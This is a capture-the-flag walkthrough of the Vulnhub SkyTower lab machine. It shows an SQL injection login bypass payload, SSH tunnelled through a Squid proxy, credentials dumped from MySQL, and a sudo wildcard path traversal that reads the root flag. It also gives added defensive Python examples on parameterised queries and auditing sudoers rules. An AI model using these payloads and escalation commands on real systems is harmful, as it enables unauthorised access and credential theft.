Vulnhub Machine SkyTower Walkthrough (OSCP friendly / No Metasploit)
Nmap:
# Nmap 7.70 scan initiated Thu Aug  8 02:55:03 2019 as: nmap -sC -sV -p- -oN nmap 192.168.8.183
Nmap scan report for SkyTower (192.168.8.183)
Host is up (0.0019s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported: GET HEAD
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug  8 02:55:57 2019 -- 1 IP address (1 host up) scanned in 54.69 seconds
SSH is filtered and a Squid HTTP proxy listens on port 3128, so SSH is most probably reachable through the proxy; we will check that later. First, the web server.
There is a login page, so let's try common credentials and SQL injection.
On trying SQL injection the server returns an error, but it also tells us that some characters are filtered. After trying several characters, the string test' || 1=1# worked: user test@test with password test' || 1=1#.
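As an added illustration of why a character blacklist does not stop this bypass (example code written for this walkthrough; the SkyTower application's source is not on the page, and the blacklist below is an assumption): the vulnerable login builds its query by string concatenation behind the filter, the hardened one binds the same input as a parameter. SQLite is used so the example runs offline; on the box's MySQL, `||` is an alias for OR and `#` opens a comment, which is why the page's `test' || 1=1#` works there, whereas SQLite needs `OR` and `--`.

```python
import sqlite3

# Constructed copy of the page's `login` table, loaded into in-memory SQLite.
ROWS = [
    (1, "john@skytech.com", "hereisjohn"),
    (2, "sara@skytech.com", "ihatethisjob"),
    (3, "william@skytech.com", "senseable"),
]

# Assumed blacklist: the box reports that "some characters are filtered" but
# not which ones, so this list is a stand-in, not the application's own.
BLOCKED = ['"', ';', '/*']


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.executemany("INSERT INTO login VALUES (?, ?, ?)", ROWS)
    return db


def passes_filter(value):
    """Blacklist check: rejects a few tokens and lets everything else through."""
    return not any(token in value for token in BLOCKED)


def login_vulnerable(db, email, password):
    """String-built query behind the blacklist: whatever survives the filter is
    spliced into the SQL, so a quote plus a tautology rewrites the WHERE clause
    and the first row of the table (john) is returned as the logged-in user."""
    if not (passes_filter(email) and passes_filter(password)):
        return None
    sql = f"SELECT email FROM login WHERE email='{email}' AND password='{password}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, email, password):
    """Parameterised query: the same text is bound as a value, never parsed as SQL."""
    sql = "SELECT email FROM login WHERE email=? AND password=?"
    row = db.execute(sql, (email, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "test' OR 1=1 -- "  # SQLite form of the page's password test' || 1=1#
    print("vulnerable:", login_vulnerable(db, "test@test", payload))  # john@skytech.com
    print("safe:      ", login_safe(db, "test@test", payload))        # None
    print("safe, real:", login_safe(db, "john@skytech.com", "hereisjohn"))
```

The blacklist is only there to show that it changes nothing: the payload contains none of the blocked tokens and still turns the password check into `... OR 1=1`. The parameterised version needs no filter at all, because the driver never lets the bound string reach the SQL parser.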
After logging in we get credentials for the user john; let's try them over SSH.
First we need to reach SSH through the proxy. There are two ways.
One is proxytunnel:
proxytunnel -p 192.168.8.183:3128 -d 192.168.8.183:22 -a 1234
The second is proxychains, by adding the proxy entry to /etc/proxychains.conf and running
proxychains ssh john@192.168.8.183
Our session was terminated as soon as it connected.
Requesting a new bash shell on connection works around this; the first thing to do once inside is to remove the condition that terminates the session immediately.
Go to /var/www, where the MySQL database credentials are stored as root:root.
We can also find this by downloading the LinEnum.sh script via wget and executing it.
Log into MySQL with those credentials. In MySQL:
show databases;
use SkyTech;
show tables;
mysql> select * from login;
+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | john@skytech.com    | hereisjohn   |
|  2 | sara@skytech.com    | ihatethisjob |
|  3 | william@skytech.com | senseable    |
+----+---------------------+--------------+
3 rows in set (0.01 sec)
Let's log in as sara.
proxychains ssh sara@192.168.8.183 /bin/bash
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.8.183:3128-<><>-192.168.8.183:22-<><>-OK
sara@192.168.8.183's password:
id
uid=1001(sara) gid=1001(sara) groups=1001(sara)
We checked sara's privileges with sudo -l:
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
So we can use sudo only for /bin/cat and /bin/ls on paths matching /accounts/*, but the wildcard also matches .., so the path can step out of /accounts.
sudo /bin/ls /accounts/../root
flag.txt
sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
We have root credentials as root:theskytower.
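To show why that sudoers rule is unsafe, here is an added audit script (written for this walkthrough, not a tool from the box or from sudo) that emulates sudoers matching for the two rules from the sudo -l output above and flags a request whose wildcard argument, once normalised, leaves the directory the rule author intended. sudoers(5) documents that a wildcard in a command argument does match "/", so a pattern like /accounts/* never excludes ".." components; the function names and the assumption that /accounts is the intended directory are this example's own.

```python
import fnmatch
import os
import shlex

# The two command specs from the page's `sudo -l` output for user sara.
RULES = [
    "/bin/cat /accounts/*",
    "/bin/ls /accounts/*",
]
WILDCARDS = set("*?[")


def rule_matches(rule, command):
    """Emulate sudoers matching: the program path must be identical and each
    argument is glob-matched. fnmatch lets '*' match '/', which is also sudo's
    documented behaviour for arguments, so '..' components pass the pattern."""
    rule_parts, cmd_parts = shlex.split(rule), shlex.split(command)
    if len(rule_parts) != len(cmd_parts) or rule_parts[0] != cmd_parts[0]:
        return False
    return all(fnmatch.fnmatchcase(arg, pat)
               for pat, arg in zip(rule_parts[1:], cmd_parts[1:]))


def intended_dir(pattern):
    """Directory the rule author meant: the literal part before the first wildcard
    ('/accounts/' for '/accounts/*'), reduced to its directory ('/accounts')."""
    literal = pattern
    for i, ch in enumerate(pattern):
        if ch in WILDCARDS:
            literal = pattern[:i]
            break
    return os.path.dirname(literal)


def escapes(pattern, arg):
    """True when the argument resolves (lexically, via normpath) outside the
    intended directory, i.e. when '..' was used to walk out of it."""
    base = intended_dir(pattern)
    resolved = os.path.normpath(arg)
    if not os.path.isabs(resolved):
        return True  # a relative path is never confined to the intended directory
    return os.path.commonpath([base, resolved]) != base


def audit(rules, command):
    """Return (matching rule, escaped) for a requested sudo command line, or
    (None, False) when no rule would allow it at all."""
    for rule in rules:
        if rule_matches(rule, command):
            pats, args = shlex.split(rule)[1:], shlex.split(command)[1:]
            escaped = any(escapes(p, a) for p, a in zip(pats, args) if WILDCARDS & set(p))
            return rule, escaped
    return None, False


if __name__ == "__main__":
    for cmd in ("/bin/cat /accounts/sara",
                "/bin/ls /accounts/../root",
                "/bin/cat /accounts/../root/flag.txt",
                "/bin/cat /root/flag.txt"):
        rule, escaped = audit(RULES, cmd)
        print(f"{cmd:40} rule: {rule!s:22} escapes /accounts: {escaped}")
```

The remediation follows from the check: a wildcard argument cannot confine a path, so either name the permitted files explicitly in sudoers, or grant a small wrapper script that canonicalises its argument (realpath) and refuses anything outside /accounts before it calls cat or ls. The same normalise-and-compare logic can be run over auth.log sudo entries to spot ".." in arguments of wildcard rules after the fact.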
574r570rm